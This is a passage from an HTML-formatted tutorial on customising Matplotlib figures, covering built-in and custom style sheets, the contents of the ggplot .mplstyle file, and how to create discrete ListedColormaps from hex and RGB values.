&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;matplotlib.pyplot&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;style&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;available
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will use the plot below as an example.
This was created with the default Matplotlib theme.&lt;/p&gt;
&lt;p&gt;&lt;img src="graphics/default_plot-1.png" alt="Graph with time on the x axis and amplitude on the y axis.
The plot shows two oscillating lines, one in blue and the other in orange.
The background of the plot is white, there are no grid lines.
The axes are labeled and the plot has the title &amp;quot;Damped oscillator&amp;quot;." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;We can change the style of the figure,
as well as the rest of the figures throughout a script/ notebook, with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;style&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;use(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dark_background&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we now look at our example again, we can see that the formatting has changed.&lt;/p&gt;
&lt;p&gt;&lt;img src="graphics/dark_plot-3.png" alt="Graph with time on the x axis and amplitude on the y axis.
The plot shows two oscillating lines, one in blue and the other in yellow.
The background of the plot is black, the text is white and there are no grid lines.
The text is in the same font." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;If you like the default look of plots in the {ggplot2} R package, there is also a style sheet for that,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;style&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;use(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/ggplot_plot-5.png" alt="Graph with time on the x axis and amplitude on the y axis.
The plot shows two oscillating lines, one in red and the other in blue.
The background of the plot is grey, the text is dark grey and the plot has grid lines.
The text has a larger font size." width="768" /&gt;&lt;/p&gt;
&lt;h3 id="creating-your-own-style-sheet"&gt;Creating your own style sheet&lt;/h3&gt;
&lt;p&gt;If you are writing a paper or a report you may want to define your own set of plotting parameters to be used throughout. You may also want to be able to use these parameters in several scripts and be able to share them with collaborators to ensure a consistent aesthetic. You can do this by creating your own style sheet.&lt;/p&gt;
&lt;p&gt;The inbuilt style sheets are defined in &lt;code&gt;.mplstyle&lt;/code&gt; files. You can find out where these are located by running&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;os&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;os&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;path&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;join(mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get_data_path(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;stylelib&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you are using miniconda the path returned will look something like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;~/&lt;/span&gt;miniconda3&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;lib&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;python3&lt;span style="color:#a5d6ff"&gt;.8&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;site&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;packages&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;data&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;stylelib
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In the &lt;code&gt;stylelib/&lt;/code&gt; folder you will find all the inbuilt &lt;code&gt;.mplstyle&lt;/code&gt; files.
Taking a look at the &lt;code&gt;ggplot.mplstyle&lt;/code&gt; file,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# from https://everyhue.me/posts/sane-color-scheme-for-matplotlib/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;patch&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linewidth: &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;patch&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;facecolor: &lt;span style="color:#a5d6ff"&gt;348&lt;/span&gt;ABD &lt;span style="color:#8b949e;font-style:italic"&gt;# blue&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;patch&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;edgecolor: EEEEEE
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;patch&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;antialiased: &lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;font&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;size: &lt;span style="color:#a5d6ff"&gt;10.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;facecolor: E5E5E5
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;edgecolor: white
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linewidth: &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;grid: &lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;titlesize: x&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;large
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;labelsize: large
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;labelcolor: &lt;span style="color:#a5d6ff"&gt;555555&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;axisbelow: &lt;span style="color:#79c0ff"&gt;True&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# grid/ticks are below elements (e.g., lines, text)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;prop_cycle: cycler(&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;, [&lt;span style="color:#a5d6ff"&gt;&amp;#39;E24A33&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;348ABD&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;988ED5&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;777777&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;FBC15E&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;8EBA42&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;FFB5B8&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# E24A33 : red&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 348ABD : blue&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 988ED5 : purple&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 777777 : gray&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# FBC15E : yellow&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 8EBA42 : green&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# FFB5B8 : pink&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;xtick&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;color: &lt;span style="color:#a5d6ff"&gt;555555&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;xtick&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;direction: out
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ytick&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;color: &lt;span style="color:#a5d6ff"&gt;555555&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ytick&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;direction: out
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grid&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;color: white
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grid&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linestyle: &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# solid line&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;figure&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;facecolor: white
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;figure&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;edgecolor: &lt;span style="color:#a5d6ff"&gt;0.50&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;we can see that it contains a collection of rcParam settings.&lt;/p&gt;
&lt;p&gt;Creating your own style sheet is very straightforward. Simply create a file with a &lt;code&gt;.mplstyle&lt;/code&gt; extension, then put all your rcParam settings in here with the same format as the file shown above. If you save this file in &lt;code&gt;stylelib/&lt;/code&gt; you will be able to use your style sheet in your Python script with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;style&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;use(&lt;span style="color:#a5d6ff"&gt;&amp;#34;style_sheet_name&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you save your style sheet elsewhere you will need to specify the full or relative path,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;style&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;use(&lt;span style="color:#a5d6ff"&gt;&amp;#34;path_to_style_sheet/style_sheet_name.mplstyle&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="colourmaps"&gt;Colourmaps&lt;/h2&gt;
&lt;p&gt;Matplotlib has a variety of &lt;a href="https://matplotlib.org/stable/gallery/color/colormap_reference.html" rel="external"&gt;inbuilt colourmaps&lt;/a&gt;
to choose from.
If those colours don&amp;rsquo;t take your fancy then there are also external libraries that provide additional colourmaps.
A popular one is &lt;a href="https://pypi.org/project/palettable/" rel="external"&gt;palettable&lt;/a&gt;, which includes
a series of colourmaps generated from Wes Anderson movies.&lt;/p&gt;
&lt;p&gt;If you are feeling creative, or if you want the colours of your plots to match a particular theme or company branding,
then you can also create your own colourmap.&lt;/p&gt;
&lt;p&gt;A colourmap object takes a number between 0 and 1 and maps this to a colour.
In Matplotlib, there are two colourmap classes: &lt;code&gt;ListedColormap&lt;/code&gt; and &lt;code&gt;LinearSegmentedColormap&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="listedcolormaps"&gt;ListedColormaps&lt;/h3&gt;
&lt;p&gt;The colours for a &lt;code&gt;ListedColormap&lt;/code&gt; are stored in a &lt;code&gt;.colors&lt;/code&gt; attribute. We can take a look at the &lt;code&gt;.colors&lt;/code&gt; attribute of the inbuilt
&amp;ldquo;viridis&amp;rdquo; colourmap with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Sample 5 values from map&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;viridis &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;colormaps[&lt;span style="color:#a5d6ff"&gt;&amp;#34;viridis&amp;#34;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;resampled(&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(viridis&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;colors)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [[0.267004 0.004874 0.329415 1. ]
## [0.229739 0.322361 0.545706 1. ]
## [0.127568 0.566949 0.550556 1. ]
## [0.369214 0.788888 0.382914 1. ]
## [0.993248 0.906157 0.143936 1. ]]
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This is a 5 x 4 array of RGBA values (as we sampled 5 values from the full map).&lt;/p&gt;
&lt;h4 id="creating-a-discrete-listedcolormap"&gt;Creating a discrete ListedColormap&lt;/h4&gt;
&lt;p&gt;To create a discrete colourmap we can simply pass a list of
colours to &lt;code&gt;ListedColormap&lt;/code&gt;. These can be given as
&lt;a href="https://matplotlib.org/stable/gallery/color/named_colors.html" rel="external"&gt;named Matplotlib colours&lt;/a&gt;,
or as hex values.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;matplotlib.colors&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ListedColormap
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;discrete_cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ListedColormap([&lt;span style="color:#a5d6ff"&gt;&amp;#34;#12a79d&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#293d9b&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#4898a8&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#40b93c&amp;#34;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To look at this colourmap we will use the following code.
This plots a colourbar on its own.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_cmap&lt;/span&gt;(cmap):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fig, cax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;subplots(figsize&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cb1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;colorbar&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Colorbar(cax, cmap&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;cmap, orientation&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;horizontal&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tight_layout()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;show()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_cmap(discrete_cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/discrete-colour-bar-hex-4-7.png" alt="Horizontal colour bar, evenly split into four discrete colours: turquoise,
dark blue, light blue, green. The x-axis ranges from 0 to 1." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;We can also specify the number of colours we want in the colourmap with the argument, &lt;code&gt;N&lt;/code&gt;.
If &lt;code&gt;N&lt;/code&gt; is greater than the length of the list provided then the colours are repeated,
otherwise the map is truncated at &lt;code&gt;N&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;discrete_cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ListedColormap(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;#12a79d&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#293d9b&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#4898a8&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#40b93c&amp;#34;&lt;/span&gt;], N&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_cmap(discrete_cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/discrete-colour-bar-hex-8-9.png" alt="Horizontal colour bar, evenly split into eight discrete colours. The four colours
turquoise, dark blue, light blue, green are repeated. The x-axis ranges from 0 to 1." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;As well as using named/hex colours, we can also create a colourmap by passing an N x 3 or
N x 4 array of RGB or RGBA values to &lt;code&gt;ListedColormap&lt;/code&gt;.
To create a similar colourmap to above this would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;carray &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;array([
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;18&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;167&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;157&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;41&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;61&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;155&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;72&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;152&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;168&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;64&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;185&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;discrete_cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ListedColormap(carray)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_cmap(discrete_cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/discrete-colourbar-rgb-11.png" alt="Horizontal colour bar evenly split into four discrete colours: turquoise,
dark blue, light blue, green. The x-axis ranges from 0 to 1." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;Note that here the RGB values were originally on a scale of 0&amp;ndash;255.
However, Matplotlib expects a scale of 0&amp;ndash;1. Hence the division of our array by 255.&lt;/p&gt;
&lt;h4 id="creating-a-continuous-listedcolormap"&gt;Creating a continuous ListedColormap&lt;/h4&gt;
&lt;p&gt;To create a continuous colourmap we need an array of gradually changing colours.
This can be achieved using &lt;code&gt;np.linspace(start, stop, num)&lt;/code&gt;. For example, to generate a fading colourmap,
we can use an RGB value from above as the start point, and white (1) as the endpoint.&lt;/p&gt;
